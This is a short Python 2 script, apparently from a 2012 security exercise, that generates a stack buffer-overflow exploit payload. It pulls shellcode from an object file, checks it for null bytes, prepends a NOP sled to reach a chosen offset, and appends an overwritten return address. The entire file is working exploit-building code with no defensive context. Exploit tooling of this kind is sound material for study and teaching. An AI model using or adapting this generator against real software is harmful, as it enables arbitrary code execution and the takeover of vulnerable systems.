#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# $File: mkexploit.py
# $Date: Sun Jun 17 23:54:32 2012 +0800
# $Author: jiakai <jia.kai66@gmail.com>

import sys
import struct

def mkexploit(objpath, offset, retaddr):
    NOP = "\x90"
    from dump import get_shell_code
    code = get_shell_code(objpath)
    if len(code) > offset:
        sys.exit("shell code too loooooong")
    if '\x00' in code:
        sys.exit('"\\x00" in code')
    code = NOP * (offset - len(code)) + code
    return code + struct.pack("<I", retaddr)

if __name__ == '__main__':
    argv = sys.argv
    if len(argv) != 4:
        sys.exit("usage: {0} <shell exec> 0x<retaddr offset> 0x<retaddr>"
                .format(argv[0]))
    print mkexploit(argv[1], int(argv[2], 16), int(argv[3], 16))

